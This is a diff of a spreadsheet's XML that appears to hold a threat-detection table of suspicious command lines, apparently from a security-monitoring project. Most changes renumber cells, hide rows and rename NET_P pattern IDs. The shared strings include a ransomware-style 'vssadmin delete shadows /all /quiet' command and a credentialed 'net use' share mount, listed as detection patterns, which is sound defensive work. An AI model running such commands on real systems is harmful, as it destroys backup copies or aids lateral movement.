       <c r="C211" s="1"/>
       <c r="E211" t="s">
-        <v>312</v>
+        <v>239</v>
       </c>
       <c r="F211" t="s">
-        <v>350</v>
-      </c>
-    </row>
-    <row r="212" spans="1:6" ht="51" hidden="1">
+        <v>238</v>
+      </c>
+    </row>
+    <row r="212" spans="1:6" ht="34">
       <c r="A212" t="s">
-        <v>21</v>
+        <v>24</v>
       </c>
       <c r="B212" s="1" t="s">
-        <v>353</v>
-      </c>
-      <c r="C212" s="1"/>
+        <v>267</v>
+      </c>
+      <c r="C212" s="1" t="s">
+        <v>268</v>
+      </c>
       <c r="E212" t="s">
-        <v>312</v>
+        <v>239</v>
       </c>
       <c r="F212" t="s">
-        <v>350</v>
-      </c>
-    </row>
-    <row r="213" spans="1:6" ht="34" hidden="1">
+        <v>238</v>
+      </c>
+    </row>
+    <row r="213" spans="1:6" ht="17">
       <c r="A213" t="s">
-        <v>21</v>
+        <v>24</v>
       </c>
       <c r="B213" s="1" t="s">
-        <v>354</v>
+        <v>287</v>
       </c>
       <c r="C213" s="1"/>
       <c r="E213" t="s">
-        <v>312</v>
+        <v>239</v>
       </c>
       <c r="F213" t="s">
-        <v>350</v>
-      </c>
-    </row>
-    <row r="214" spans="1:6" ht="51" hidden="1">
+        <v>289</v>
+      </c>
+    </row>
+    <row r="214" spans="1:6" ht="17">
       <c r="A214" t="s">
-        <v>119</v>
+        <v>24</v>
       </c>
       <c r="B214" s="1" t="s">
-        <v>355</v>
+        <v>288</v>
       </c>
       <c r="C214" s="1"/>
       <c r="E214" t="s">
-        <v>312</v>
+        <v>239</v>
       </c>
       <c r="F214" t="s">
-        <v>350</v>
-      </c>
-    </row>
-    <row r="215" spans="1:6" ht="34" hidden="1">
+        <v>289</v>
+      </c>
+    </row>
+    <row r="215" spans="1:6" ht="204">
       <c r="A215" t="s">
-        <v>11</v>
+        <v>24</v>
       </c>
       <c r="B215" s="1" t="s">
-        <v>356</v>
+        <v>295</v>
       </c>
       <c r="C215" s="1"/>
       <c r="E215" t="s">
-        <v>312</v>
+        <v>239</v>
       </c>
       <c r="F215" t="s">
-        <v>350</v>
-      </c>
-    </row>
-    <row r="216" spans="1:6" ht="68" hidden="1">
+        <v>294</v>
+      </c>
+    </row>
+    <row r="216" spans="1:6" ht="17">
       <c r="A216" t="s">
-        <v>359</v>
+        <v>24</v>
       </c>
       <c r="B216" s="1" t="s">
-        <v>357</v>
+        <v>389</v>
       </c>
       <c r="C216" s="1"/>
       <c r="E216" t="s">
-        <v>312</v>
+        <v>385</v>
       </c>
       <c r="F216" t="s">
-        <v>350</v>
-      </c>
-    </row>
-    <row r="217" spans="1:6" ht="17" hidden="1">
+        <v>386</v>
+      </c>
+    </row>
+    <row r="217" spans="1:6" ht="17">
       <c r="A217" t="s">
-        <v>360</v>
+        <v>40</v>
       </c>
       <c r="B217" s="1" t="s">
-        <v>358</v>
-      </c>
-      <c r="C217" s="1"/>
+        <v>19</v>
+      </c>
+      <c r="C217" s="1" t="s">
+        <v>41</v>
+      </c>
       <c r="E217" t="s">
-        <v>312</v>
+        <v>6</v>
       </c>
       <c r="F217" t="s">
-        <v>350</v>
-      </c>
-    </row>
-    <row r="218" spans="1:6" ht="17" hidden="1">
+        <v>7</v>
+      </c>
+    </row>
+    <row r="218" spans="1:6" ht="17">
       <c r="A218" t="s">
-        <v>103</v>
+        <v>40</v>
       </c>
       <c r="B218" s="1" t="s">
-        <v>361</v>
-      </c>
-      <c r="C218" s="1"/>
+        <v>39</v>
+      </c>
+      <c r="C218" s="1" t="s">
+        <v>41</v>
+      </c>
       <c r="E218" t="s">
-        <v>312</v>
+        <v>6</v>
       </c>
       <c r="F218" t="s">
-        <v>350</v>
-      </c>
-    </row>
-    <row r="219" spans="1:6" ht="34" hidden="1">
+        <v>28</v>
+      </c>
+    </row>
+    <row r="219" spans="1:6" ht="34">
       <c r="A219" t="s">
-        <v>103</v>
+        <v>40</v>
       </c>
       <c r="B219" s="1" t="s">
-        <v>362</v>
-      </c>
-      <c r="C219" s="1"/>
+        <v>55</v>
+      </c>
+      <c r="C219" s="1" t="s">
+        <v>56</v>
+      </c>
       <c r="E219" t="s">
-        <v>312</v>
+        <v>6</v>
       </c>
       <c r="F219" t="s">
-        <v>350</v>
-      </c>
-    </row>
-    <row r="220" spans="1:6" ht="17" hidden="1">
+        <v>28</v>
+      </c>
+    </row>
+    <row r="220" spans="1:6" ht="17">
       <c r="A220" t="s">
-        <v>364</v>
+        <v>40</v>
       </c>
       <c r="B220" s="1" t="s">
-        <v>363</v>
-      </c>
-      <c r="C220" s="1"/>
+        <v>81</v>
+      </c>
+      <c r="C220" s="1" t="s">
+        <v>56</v>
+      </c>
       <c r="E220" t="s">
-        <v>312</v>
+        <v>6</v>
       </c>
       <c r="F220" t="s">
-        <v>350</v>
+        <v>72</v>
       </c>
     </row>
     <row r="221" spans="1:6" ht="17">
       <c r="A221" t="s">
-        <v>45</v>
+        <v>40</v>
       </c>
       <c r="B221" s="1" t="s">
-        <v>173</v>
+        <v>94</v>
       </c>
       <c r="C221" s="1" t="s">
-        <v>176</v>
+        <v>95</v>
       </c>
       <c r="E221" t="s">
-        <v>143</v>
+        <v>6</v>
       </c>
       <c r="F221" t="s">
-        <v>153</v>
-      </c>
-    </row>
-    <row r="222" spans="1:6" ht="17" hidden="1">
+        <v>90</v>
+      </c>
+    </row>
+    <row r="222" spans="1:6" ht="17">
       <c r="A222" t="s">
-        <v>64</v>
+        <v>40</v>
       </c>
       <c r="B222" s="1" t="s">
-        <v>366</v>
-      </c>
-      <c r="C222" s="1"/>
+        <v>120</v>
+      </c>
+      <c r="C222" s="1" t="s">
+        <v>124</v>
+      </c>
       <c r="E222" t="s">
-        <v>312</v>
+        <v>6</v>
       </c>
       <c r="F222" t="s">
-        <v>350</v>
-      </c>
-    </row>
-    <row r="223" spans="1:6" ht="17" hidden="1">
+        <v>90</v>
+      </c>
+    </row>
+    <row r="223" spans="1:6" ht="17">
       <c r="A223" t="s">
-        <v>93</v>
+        <v>40</v>
       </c>
       <c r="B223" s="1" t="s">
-        <v>367</v>
-      </c>
-      <c r="C223" s="1"/>
+        <v>121</v>
+      </c>
+      <c r="C223" s="1" t="s">
+        <v>124</v>
+      </c>
       <c r="E223" t="s">
-        <v>312</v>
+        <v>6</v>
       </c>
       <c r="F223" t="s">
-        <v>350</v>
-      </c>
-    </row>
-    <row r="224" spans="1:6" ht="17" hidden="1">
+        <v>90</v>
+      </c>
+    </row>
+    <row r="224" spans="1:6" ht="17">
       <c r="A224" t="s">
-        <v>93</v>
+        <v>40</v>
       </c>
       <c r="B224" s="1" t="s">
-        <v>368</v>
-      </c>
-      <c r="C224" s="1"/>
+        <v>122</v>
+      </c>
+      <c r="C224" s="1" t="s">
+        <v>124</v>
+      </c>
       <c r="E224" t="s">
-        <v>312</v>
+        <v>6</v>
       </c>
       <c r="F224" t="s">
-        <v>350</v>
-      </c>
-    </row>
-    <row r="225" spans="1:6" ht="17" hidden="1">
+        <v>90</v>
+      </c>
+    </row>
+    <row r="225" spans="1:6" ht="17">
       <c r="A225" t="s">
-        <v>93</v>
+        <v>40</v>
       </c>
       <c r="B225" s="1" t="s">
-        <v>369</v>
-      </c>
-      <c r="C225" s="1"/>
+        <v>123</v>
+      </c>
+      <c r="C225" s="1" t="s">
+        <v>124</v>
+      </c>
       <c r="E225" t="s">
-        <v>312</v>
+        <v>6</v>
       </c>
       <c r="F225" t="s">
-        <v>350</v>
+        <v>90</v>
       </c>
     </row>
     <row r="226" spans="1:6" ht="17">
       <c r="A226" t="s">
-        <v>45</v>
+        <v>40</v>
       </c>
       <c r="B226" s="1" t="s">
-        <v>261</v>
-      </c>
-      <c r="C226" s="1" t="s">
-        <v>262</v>
-      </c>
+        <v>139</v>
+      </c>
+      <c r="C226" s="1"/>
       <c r="E226" t="s">
-        <v>239</v>
+        <v>6</v>
       </c>
       <c r="F226" t="s">
-        <v>238</v>
-      </c>
-    </row>
-    <row r="227" spans="1:6" ht="17" hidden="1">
+        <v>90</v>
+      </c>
+    </row>
+    <row r="227" spans="1:6" ht="17">
       <c r="A227" t="s">
-        <v>64</v>
+        <v>11</v>
       </c>
       <c r="B227" s="1" t="s">
-        <v>327</v>
-      </c>
-      <c r="C227" s="1"/>
+        <v>8</v>
+      </c>
+      <c r="C227" s="1" t="s">
+        <v>35</v>
+      </c>
       <c r="E227" t="s">
-        <v>312</v>
+        <v>6</v>
       </c>
       <c r="F227" t="s">
-        <v>350</v>
-      </c>
-    </row>
-    <row r="228" spans="1:6" ht="34" hidden="1">
+        <v>7</v>
+      </c>
+    </row>
+    <row r="228" spans="1:6" ht="17">
       <c r="A228" t="s">
-        <v>348</v>
+        <v>11</v>
       </c>
       <c r="B228" s="1" t="s">
-        <v>371</v>
-      </c>
-      <c r="C228" s="1"/>
+        <v>15</v>
+      </c>
+      <c r="C228" s="1" t="s">
+        <v>33</v>
+      </c>
       <c r="E228" t="s">
-        <v>312</v>
+        <v>6</v>
       </c>
       <c r="F228" t="s">
-        <v>350</v>
-      </c>
-    </row>
-    <row r="229" spans="1:6" ht="34" hidden="1">
+        <v>7</v>
+      </c>
+    </row>
+    <row r="229" spans="1:6" ht="17">
       <c r="A229" t="s">
-        <v>348</v>
+        <v>11</v>
       </c>
       <c r="B229" s="1" t="s">
-        <v>372</v>
-      </c>
-      <c r="C229" s="1"/>
+        <v>32</v>
+      </c>
+      <c r="C229" s="1" t="s">
+        <v>33</v>
+      </c>
       <c r="E229" t="s">
-        <v>312</v>
+        <v>6</v>
       </c>
       <c r="F229" t="s">
-        <v>350</v>
-      </c>
-    </row>
-    <row r="230" spans="1:6" ht="17" hidden="1">
+        <v>28</v>
+      </c>
+    </row>
+    <row r="230" spans="1:6" ht="17">
       <c r="A230" t="s">
-        <v>93</v>
+        <v>11</v>
       </c>
       <c r="B230" s="1" t="s">
-        <v>373</v>
-      </c>
-      <c r="C230" s="1"/>
+        <v>34</v>
+      </c>
+      <c r="C230" s="1" t="s">
+        <v>35</v>
+      </c>
       <c r="E230" t="s">
-        <v>312</v>
+        <v>6</v>
       </c>
       <c r="F230" t="s">
-        <v>350</v>
-      </c>
-    </row>
-    <row r="231" spans="1:6" ht="17" hidden="1">
+        <v>28</v>
+      </c>
+    </row>
+    <row r="231" spans="1:6" ht="17">
       <c r="A231" t="s">
-        <v>376</v>
+        <v>11</v>
       </c>
       <c r="B231" s="1" t="s">
-        <v>374</v>
+        <v>73</v>
       </c>
       <c r="C231" s="1"/>
       <c r="E231" t="s">
-        <v>312</v>
+        <v>6</v>
       </c>
       <c r="F231" t="s">
-        <v>350</v>
-      </c>
-    </row>
-    <row r="232" spans="1:6" ht="17" hidden="1">
+        <v>72</v>
+      </c>
+    </row>
+    <row r="232" spans="1:6" ht="17">
       <c r="A232" t="s">
-        <v>376</v>
+        <v>11</v>
       </c>
       <c r="B232" s="1" t="s">
-        <v>375</v>
+        <v>136</v>
       </c>
       <c r="C232" s="1"/>
       <c r="E232" t="s">
-        <v>312</v>
+        <v>6</v>
       </c>
       <c r="F232" t="s">
-        <v>350</v>
-      </c>
-    </row>
-    <row r="233" spans="1:6" ht="17" hidden="1">
+        <v>90</v>
+      </c>
+    </row>
+    <row r="233" spans="1:6" ht="17">
       <c r="A233" t="s">
-        <v>335</v>
+        <v>11</v>
       </c>
       <c r="B233" s="1" t="s">
-        <v>377</v>
-      </c>
-      <c r="C233" s="1" t="s">
-        <v>378</v>
-      </c>
+        <v>310</v>
+      </c>
+      <c r="C233" s="1"/>
       <c r="E233" t="s">
-        <v>381</v>
+        <v>312</v>
       </c>
       <c r="F233" t="s">
-        <v>380</v>
-      </c>
-    </row>
-    <row r="234" spans="1:6" ht="17" hidden="1">
+        <v>311</v>
+      </c>
+    </row>
+    <row r="234" spans="1:6" ht="34">
       <c r="A234" t="s">
-        <v>313</v>
+        <v>11</v>
       </c>
       <c r="B234" s="1" t="s">
-        <v>379</v>
+        <v>340</v>
       </c>
       <c r="C234" s="1"/>
       <c r="E234" t="s">
-        <v>381</v>
+        <v>312</v>
       </c>
       <c r="F234" t="s">
-        <v>380</v>
-      </c>
-    </row>
-    <row r="235" spans="1:6" ht="34" hidden="1">
+        <v>332</v>
+      </c>
+    </row>
+    <row r="235" spans="1:6" ht="17">
       <c r="A235" t="s">
-        <v>348</v>
+        <v>11</v>
       </c>
       <c r="B235" s="1" t="s">
-        <v>382</v>
+        <v>341</v>
       </c>
       <c r="C235" s="1"/>
       <c r="E235" t="s">
-        <v>381</v>
+        <v>312</v>
       </c>
       <c r="F235" t="s">
-        <v>380</v>
+        <v>342</v>
       </c>
     </row>
     <row r="236" spans="1:6" ht="17">
       <c r="A236" t="s">
-        <v>45</v>
+        <v>11</v>
       </c>
       <c r="B236" s="1" t="s">
-        <v>261</v>
+        <v>344</v>
       </c>
       <c r="C236" s="1"/>
       <c r="E236" t="s">
-        <v>239</v>
+        <v>312</v>
       </c>
       <c r="F236" t="s">
-        <v>294</v>
-      </c>
-    </row>
-    <row r="237" spans="1:6" ht="17" hidden="1">
+        <v>342</v>
+      </c>
+    </row>
+    <row r="237" spans="1:6" ht="17">
       <c r="A237" t="s">
-        <v>119</v>
+        <v>11</v>
       </c>
       <c r="B237" s="1" t="s">
-        <v>384</v>
+        <v>346</v>
       </c>
       <c r="C237" s="1"/>
       <c r="E237" t="s">
-        <v>385</v>
+        <v>312</v>
       </c>
       <c r="F237" t="s">
-        <v>386</v>
-      </c>
-    </row>
-    <row r="238" spans="1:6" ht="34" hidden="1">
+        <v>342</v>
+      </c>
+    </row>
+    <row r="238" spans="1:6" ht="34">
       <c r="A238" t="s">
-        <v>17</v>
+        <v>11</v>
       </c>
       <c r="B238" s="1" t="s">
-        <v>387</v>
+        <v>356</v>
       </c>
       <c r="C238" s="1"/>
       <c r="E238" t="s">
-        <v>385</v>
+        <v>312</v>
       </c>
       <c r="F238" t="s">
-        <v>386</v>
-      </c>
-    </row>
-    <row r="239" spans="1:6" ht="17" hidden="1">
+        <v>350</v>
+      </c>
+    </row>
+    <row r="239" spans="1:6" ht="17">
       <c r="A239" t="s">
         <v>11</v>
       </c>
@@ -5526,19 +5518,21 @@
         <v>386</v>
       </c>
     </row>
-    <row r="240" spans="1:6" ht="17" hidden="1">
+    <row r="240" spans="1:6" ht="51">
       <c r="A240" t="s">
-        <v>24</v>
+        <v>280</v>
       </c>
       <c r="B240" s="1" t="s">
-        <v>389</v>
-      </c>
-      <c r="C240" s="1"/>
+        <v>279</v>
+      </c>
+      <c r="C240" s="1" t="s">
+        <v>281</v>
+      </c>
       <c r="E240" t="s">
-        <v>385</v>
+        <v>239</v>
       </c>
       <c r="F240" t="s">
-        <v>386</v>
+        <v>277</v>
       </c>
     </row>
   </sheetData>

--- a/docs/TIP-CommandLine.xlsx
+++ b/docs/TIP-CommandLine.xlsx
@@ -8,9 +8,9 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/SOC-Puppet/docs/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{3CA496EE-F027-FF45-9946-7B54D0633C1D}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{06BBEF3F-D90D-8B4C-AB16-09A8527744FD}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="60" yWindow="-21100" windowWidth="34560" windowHeight="21100" xr2:uid="{A9D12C86-CCAB-E94D-B7F0-B816A83AE7B1}"/>
+    <workbookView xWindow="0" yWindow="940" windowWidth="34560" windowHeight="21100" xr2:uid="{A9D12C86-CCAB-E94D-B7F0-B816A83AE7B1}"/>
   </bookViews>
   <sheets>
     <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
@@ -36,7 +36,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1063" uniqueCount="396">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1063" uniqueCount="402">
   <si>
     <t>Pattern</t>
   </si>
@@ -171,9 +171,6 @@
   </si>
   <si>
     <t>net use \\[computer name]  /user:[domain]\[user] [password] /persistent:no</t>
-  </si>
-  <si>
-    <t>NET</t>
   </si>
   <si>
     <t>Mounts network share</t>
@@ -1303,25 +1300,49 @@
     <t>\"C:\\Windows\\System32\\cmd.exe\" /c vssadmin delete shadows /all /quiet &amp;amp</t>
   </si>
   <si>
-    <t>NET_P001</t>
-  </si>
-  <si>
-    <t>NET_P003</t>
-  </si>
-  <si>
-    <t>NET_P002</t>
-  </si>
-  <si>
-    <t>NET_P002
-NET_P003</t>
-  </si>
-  <si>
-    <t>NET_P005</t>
-  </si>
-  <si>
-    <t>NET_P103
-NET_P100
-NET_P102</t>
+    <t>NET_P1000</t>
+  </si>
+  <si>
+    <t>NET_P1001</t>
+  </si>
+  <si>
+    <t>NET_P1002</t>
+  </si>
+  <si>
+    <t>NET_P2005</t>
+  </si>
+  <si>
+    <t>NET_P1001
+NET_P2002</t>
+  </si>
+  <si>
+    <t>NET_P2004</t>
+  </si>
+  <si>
+    <t>NET_P3002</t>
+  </si>
+  <si>
+    <t>NET_P1001
+NET_P1002</t>
+  </si>
+  <si>
+    <t>NET_P1004</t>
+  </si>
+  <si>
+    <t>NET_P1001
+NET_P1002
+NET_P1004</t>
+  </si>
+  <si>
+    <t>NET_P1001
+NET_P1002
+NET_P3001</t>
+  </si>
+  <si>
+    <t>NET_</t>
+  </si>
+  <si>
+    <t>NET_3001</t>
   </si>
 </sst>
 </file>
@@ -1400,8 +1421,14 @@
 
 <file path=xl/tables/table1.xml><?xml version="1.0" encoding="utf-8"?>
 <table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{485C79FA-D6D5-EA48-96EB-664E304004D9}" name="Table1" displayName="Table1" ref="A1:F240" totalsRowShown="0">
-  <autoFilter ref="A1:F240" xr:uid="{485C79FA-D6D5-EA48-96EB-664E304004D9}"/>
-  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:F240">
+  <autoFilter ref="A1:F240" xr:uid="{485C79FA-D6D5-EA48-96EB-664E304004D9}">
+    <filterColumn colId="0">
+      <customFilters>
+        <customFilter val="*NET_*"/>
+      </customFilters>
+    </filterColumn>
+  </autoFilter>
+  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A57:F101">
     <sortCondition ref="A1:A240"/>
   </sortState>
   <tableColumns count="6">
@@ -1715,8 +1742,8 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{777F7044-177D-E446-92F0-ACF0229F6F68}">
   <dimension ref="A1:F240"/>
   <sheetViews>
-    <sheetView tabSelected="1" topLeftCell="A154" workbookViewId="0">
-      <selection activeCell="B150" sqref="B150"/>
+    <sheetView tabSelected="1" workbookViewId="0">
+      <selection activeCell="B66" sqref="B66"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>
@@ -1748,206 +1775,206 @@
         <v>5</v>
       </c>
     </row>
-    <row r="2" spans="1:6" ht="17">
+    <row r="2" spans="1:6" ht="17" hidden="1">
       <c r="A2" t="s">
+        <v>312</v>
+      </c>
+      <c r="B2" s="1" t="s">
         <v>313</v>
-      </c>
-      <c r="B2" s="1" t="s">
-        <v>314</v>
       </c>
       <c r="C2" s="1"/>
       <c r="E2" t="s">
+        <v>311</v>
+      </c>
+      <c r="F2" t="s">
+        <v>310</v>
+      </c>
+    </row>
+    <row r="3" spans="1:6" ht="17" hidden="1">
+      <c r="A3" t="s">
         <v>312</v>
       </c>
-      <c r="F2" t="s">
-        <v>311</v>
-      </c>
-    </row>
-    <row r="3" spans="1:6" ht="17">
-      <c r="A3" t="s">
-        <v>313</v>
-      </c>
       <c r="B3" s="1" t="s">
-        <v>315</v>
+        <v>314</v>
       </c>
       <c r="C3" s="1"/>
       <c r="E3" t="s">
+        <v>311</v>
+      </c>
+      <c r="F3" t="s">
+        <v>310</v>
+      </c>
+    </row>
+    <row r="4" spans="1:6" ht="17" hidden="1">
+      <c r="A4" t="s">
         <v>312</v>
       </c>
-      <c r="F3" t="s">
-        <v>311</v>
-      </c>
-    </row>
-    <row r="4" spans="1:6" ht="17">
-      <c r="A4" t="s">
-        <v>313</v>
-      </c>
       <c r="B4" s="1" t="s">
-        <v>316</v>
+        <v>315</v>
       </c>
       <c r="C4" s="1"/>
       <c r="E4" t="s">
+        <v>311</v>
+      </c>
+      <c r="F4" t="s">
+        <v>310</v>
+      </c>
+    </row>
+    <row r="5" spans="1:6" ht="17" hidden="1">
+      <c r="A5" t="s">
         <v>312</v>
       </c>
-      <c r="F4" t="s">
-        <v>311</v>
-      </c>
-    </row>
-    <row r="5" spans="1:6" ht="17">
-      <c r="A5" t="s">
-        <v>313</v>
-      </c>
       <c r="B5" s="1" t="s">
-        <v>317</v>
+        <v>316</v>
       </c>
       <c r="C5" s="1"/>
       <c r="E5" t="s">
+        <v>311</v>
+      </c>
+      <c r="F5" t="s">
+        <v>310</v>
+      </c>
+    </row>
+    <row r="6" spans="1:6" ht="17" hidden="1">
+      <c r="A6" t="s">
         <v>312</v>
       </c>
-      <c r="F5" t="s">
-        <v>311</v>
-      </c>
-    </row>
-    <row r="6" spans="1:6" ht="17">
-      <c r="A6" t="s">
-        <v>313</v>
-      </c>
       <c r="B6" s="1" t="s">
-        <v>318</v>
+        <v>317</v>
       </c>
       <c r="C6" s="1"/>
       <c r="E6" t="s">
+        <v>311</v>
+      </c>
+      <c r="F6" t="s">
+        <v>310</v>
+      </c>
+    </row>
+    <row r="7" spans="1:6" ht="17" hidden="1">
+      <c r="A7" t="s">
         <v>312</v>
       </c>
-      <c r="F6" t="s">
-        <v>311</v>
-      </c>
-    </row>
-    <row r="7" spans="1:6" ht="17">
-      <c r="A7" t="s">
-        <v>313</v>
-      </c>
       <c r="B7" s="1" t="s">
-        <v>319</v>
+        <v>318</v>
       </c>
       <c r="C7" s="1"/>
       <c r="E7" t="s">
+        <v>311</v>
+      </c>
+      <c r="F7" t="s">
+        <v>310</v>
+      </c>
+    </row>
+    <row r="8" spans="1:6" ht="17" hidden="1">
+      <c r="A8" t="s">
         <v>312</v>
       </c>
-      <c r="F7" t="s">
-        <v>311</v>
-      </c>
-    </row>
-    <row r="8" spans="1:6" ht="17">
-      <c r="A8" t="s">
-        <v>313</v>
-      </c>
       <c r="B8" s="1" t="s">
-        <v>320</v>
+        <v>319</v>
       </c>
       <c r="C8" s="1"/>
       <c r="E8" t="s">
+        <v>311</v>
+      </c>
+      <c r="F8" t="s">
+        <v>310</v>
+      </c>
+    </row>
+    <row r="9" spans="1:6" ht="119" hidden="1">
+      <c r="A9" t="s">
         <v>312</v>
       </c>
-      <c r="F8" t="s">
-        <v>311</v>
-      </c>
-    </row>
-    <row r="9" spans="1:6" ht="119">
-      <c r="A9" t="s">
-        <v>313</v>
-      </c>
       <c r="B9" s="1" t="s">
-        <v>328</v>
+        <v>327</v>
       </c>
       <c r="C9" s="1"/>
       <c r="E9" t="s">
+        <v>311</v>
+      </c>
+      <c r="F9" t="s">
+        <v>324</v>
+      </c>
+    </row>
+    <row r="10" spans="1:6" ht="119" hidden="1">
+      <c r="A10" t="s">
         <v>312</v>
       </c>
-      <c r="F9" t="s">
-        <v>325</v>
-      </c>
-    </row>
-    <row r="10" spans="1:6" ht="119">
-      <c r="A10" t="s">
-        <v>313</v>
-      </c>
       <c r="B10" s="1" t="s">
-        <v>339</v>
+        <v>338</v>
       </c>
       <c r="C10" s="1"/>
       <c r="E10" t="s">
+        <v>311</v>
+      </c>
+      <c r="F10" t="s">
+        <v>331</v>
+      </c>
+    </row>
+    <row r="11" spans="1:6" ht="17" hidden="1">
+      <c r="A11" t="s">
         <v>312</v>
       </c>
-      <c r="F10" t="s">
-        <v>332</v>
-      </c>
-    </row>
-    <row r="11" spans="1:6" ht="17">
-      <c r="A11" t="s">
-        <v>313</v>
-      </c>
       <c r="B11" s="1" t="s">
-        <v>379</v>
+        <v>378</v>
       </c>
       <c r="C11" s="1"/>
       <c r="E11" t="s">
-        <v>381</v>
+        <v>380</v>
       </c>
       <c r="F11" t="s">
-        <v>380</v>
-      </c>
-    </row>
-    <row r="12" spans="1:6" ht="34">
+        <v>379</v>
+      </c>
+    </row>
+    <row r="12" spans="1:6" ht="34" hidden="1">
       <c r="A12" t="s">
-        <v>187</v>
+        <v>186</v>
       </c>
       <c r="B12" s="1" t="s">
+        <v>184</v>
+      </c>
+      <c r="C12" s="1" t="s">
         <v>185</v>
       </c>
-      <c r="C12" s="1" t="s">
-        <v>186</v>
-      </c>
       <c r="E12" t="s">
-        <v>143</v>
+        <v>142</v>
       </c>
       <c r="F12" t="s">
-        <v>153</v>
-      </c>
-    </row>
-    <row r="13" spans="1:6" ht="17">
+        <v>152</v>
+      </c>
+    </row>
+    <row r="13" spans="1:6" ht="17" hidden="1">
       <c r="A13" t="s">
-        <v>109</v>
+        <v>108</v>
       </c>
       <c r="B13" s="1" t="s">
-        <v>108</v>
+        <v>107</v>
       </c>
       <c r="C13" s="1"/>
       <c r="E13" t="s">
         <v>6</v>
       </c>
       <c r="F13" t="s">
-        <v>90</v>
-      </c>
-    </row>
-    <row r="14" spans="1:6" ht="51">
+        <v>89</v>
+      </c>
+    </row>
+    <row r="14" spans="1:6" ht="51" hidden="1">
       <c r="A14" t="s">
-        <v>150</v>
+        <v>149</v>
       </c>
       <c r="B14" s="1" t="s">
+        <v>140</v>
+      </c>
+      <c r="C14" s="1" t="s">
         <v>141</v>
       </c>
-      <c r="C14" s="1" t="s">
+      <c r="E14" t="s">
         <v>142</v>
       </c>
-      <c r="E14" t="s">
-        <v>143</v>
-      </c>
       <c r="F14" t="s">
-        <v>153</v>
-      </c>
-    </row>
-    <row r="15" spans="1:6" ht="17">
+        <v>152</v>
+      </c>
+    </row>
+    <row r="15" spans="1:6" ht="17" hidden="1">
       <c r="A15" t="s">
         <v>23</v>
       </c>
@@ -1962,54 +1989,54 @@
         <v>7</v>
       </c>
     </row>
-    <row r="16" spans="1:6" ht="17">
+    <row r="16" spans="1:6" ht="17" hidden="1">
       <c r="A16" t="s">
         <v>23</v>
       </c>
       <c r="B16" s="1" t="s">
-        <v>78</v>
+        <v>77</v>
       </c>
       <c r="C16" s="1"/>
       <c r="E16" t="s">
         <v>6</v>
       </c>
       <c r="F16" t="s">
-        <v>72</v>
-      </c>
-    </row>
-    <row r="17" spans="1:6" ht="17">
+        <v>71</v>
+      </c>
+    </row>
+    <row r="17" spans="1:6" ht="17" hidden="1">
       <c r="A17" t="s">
         <v>23</v>
       </c>
       <c r="B17" s="1" t="s">
-        <v>138</v>
+        <v>137</v>
       </c>
       <c r="C17" s="1"/>
       <c r="E17" t="s">
         <v>6</v>
       </c>
       <c r="F17" t="s">
-        <v>90</v>
-      </c>
-    </row>
-    <row r="18" spans="1:6" ht="17">
+        <v>89</v>
+      </c>
+    </row>
+    <row r="18" spans="1:6" ht="17" hidden="1">
       <c r="A18" t="s">
         <v>23</v>
       </c>
       <c r="B18" s="1" t="s">
+        <v>262</v>
+      </c>
+      <c r="C18" s="1" t="s">
         <v>263</v>
       </c>
-      <c r="C18" s="1" t="s">
-        <v>264</v>
-      </c>
       <c r="E18" t="s">
-        <v>239</v>
+        <v>238</v>
       </c>
       <c r="F18" t="s">
-        <v>238</v>
-      </c>
-    </row>
-    <row r="19" spans="1:6" ht="17">
+        <v>237</v>
+      </c>
+    </row>
+    <row r="19" spans="1:6" ht="17" hidden="1">
       <c r="A19" t="s">
         <v>17</v>
       </c>
@@ -2017,7 +2044,7 @@
         <v>16</v>
       </c>
       <c r="C19" s="1" t="s">
-        <v>51</v>
+        <v>50</v>
       </c>
       <c r="E19" t="s">
         <v>6</v>
@@ -2026,7 +2053,7 @@
         <v>7</v>
       </c>
     </row>
-    <row r="20" spans="1:6" ht="17">
+    <row r="20" spans="1:6" ht="17" hidden="1">
       <c r="A20" t="s">
         <v>17</v>
       </c>
@@ -2034,7 +2061,7 @@
         <v>18</v>
       </c>
       <c r="C20" s="1" t="s">
-        <v>51</v>
+        <v>50</v>
       </c>
       <c r="E20" t="s">
         <v>6</v>
@@ -2043,15 +2070,15 @@
         <v>7</v>
       </c>
     </row>
-    <row r="21" spans="1:6" ht="17">
+    <row r="21" spans="1:6" ht="17" hidden="1">
       <c r="A21" t="s">
         <v>17</v>
       </c>
       <c r="B21" s="1" t="s">
-        <v>49</v>
+        <v>48</v>
       </c>
